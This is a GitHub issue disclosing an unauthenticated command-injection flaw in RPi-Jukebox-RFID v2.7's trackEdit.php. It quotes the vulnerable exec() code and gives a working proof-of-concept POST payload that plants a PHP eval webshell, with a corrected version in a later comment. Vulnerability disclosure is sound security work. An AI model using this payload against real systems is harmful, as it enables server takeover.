Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

🐛 | RPi-Jukebox-RFID V2.7_RCE_5 #2400

Open
xjzzzxx opened this issue Jul 11, 2024 · 1 comment
Open

🐛 | RPi-Jukebox-RFID V2.7_RCE_5 #2400

xjzzzxx opened this issue Jul 11, 2024 · 1 comment
Labels
bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage

Comments

@xjzzzxx
Copy link

xjzzzxx commented Jul 11, 2024

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)

Analysis

The path of the vulnerability: htdocs\trackEdit.php

if($_POST['ACTION'] == "trackDelete") {		// Line 232 (CheckPoint)
    if($_POST['deleteTrack'] == "yes") {	// Line 233 (CheckPoint)
        $exec = 'sudo rm "'.$post['folder'].'/'.$post['filename'].'"'; // Line 235 (Source)
        exec($exec);	// Line 236 (Sink)

Source from Line 235 ($_POST['folder'] and $_POST['filename'] ) .

And then there are two check point(Line 232 and Line 233) ,which we should set $_POST['ACTION'] = trackDelete and $_POST['deleteTrack'] = yes to bypass.

After bypass two check point, the source(tainted) pass to $exec and exec($exec);(Line 236) without another check.

Poc

POST /htdocs/trackEdit.php

Data:

ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22

Here is the version without url encoding for ease of understanding:

ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell5.php ;&filename=1"

Manual verification

9

10

The attacker can then easily connect to this webshell(/htdocs/shell5.php)

Logs

No response

Configuration

No response

More info

No response
@xjzzzxx xjzzzxx added bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage labels Jul 11, 2024
@xjzzzxx
Copy link
Author

xjzzzxx commented Jul 12, 2024

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

Poc_fixed

POST /htdocs/trackEdit.php

Data

ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell5%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22

Here is Data without url encoding for ease of understanding:

ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval(\$_POST['shell5']) ?>" > ./shell5.php ;&filename=1"

Manual verification

19

20

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@xjzzzxx